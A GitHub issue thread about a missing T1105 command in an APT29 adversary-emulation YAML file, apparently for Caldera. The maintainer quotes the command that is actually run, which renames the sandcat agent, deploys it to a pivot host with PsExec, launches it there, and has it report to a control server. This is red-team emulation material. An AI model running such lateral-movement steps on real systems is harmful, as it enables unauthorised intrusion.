-
Notifications
You must be signed in to change notification settings - Fork 286
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Missing code in the APT29 yaml file #92
Comments
Hello, It is missing but it should not be a problem execution wise as the part that is actually executed by caldera is line 1722 : platforms:
windows:
psh,pwsh:
command: |
move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
set-location "C:\Program Files\SysinternalsSuite\";
.\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
payloads:
- sandcat.go-windows-upx |
Thanks for your fast reply.
I'm currently a student and I'm trying to build a conversion scipt (like
"ctid_aep_to_caldera.py") in order to use the yaml file with the Atomic
framework. It is easier for me to directly copy the "executor" part because
the Atomic yaml file is very similar (exemple below). By the way, don't you
have that kind of script to convert to ATOMIC ?
Atomic YAML file :
supported_platforms:
- windows
input_arguments:
powershell_command:
description: PowerShell command to encode
type: String
default: Write-Host "Hey, Atomic!"
executor:
command: |
### PWS code ###
name: powershell
Le ven. 2 juil. 2021 à 11:21, Thamane ***@***.***> a écrit :
… Hello,
It is missing but it should not be a problem execution wise as the part
that is actually executed by caldera is line 1722
<https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/6e8b057cf176619468fa3200c09dbdac4789f5f2/apt29/Emulation_Plan/yaml/APT29.yaml#L1722>
:
platforms:
windows:
psh,pwsh:
command: | move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; set-location "C:\Program Files\SysinternalsSuite\"; .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; payloads:
- sandcat.go-windows-upx
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
<#92 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AUBC73OKTIGHOER5U6X3OU3TVWAKVANCNFSM47WIUHXA>
.
--
Cordialement.
Guillaume MULLER
|
Sorry I do not have such a script at hand. In your case just copying the command at 1722 and pasting it line 1749 will solve your problem. The executors yaml key is not parsed by caldera and is here probably for backward compatibility/cross compatibility for other framework like ATOMIC ? At least it is what is explained in this blog article :
|
In the APT29 yaml file, at line 1749, command of T1105 is missing below the "executors" tag :
line 1746 executors:
line 1747 - name: powershell
line 1748 command: |
line 1749
line 1750 - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a
The text was updated successfully, but these errors were encountered: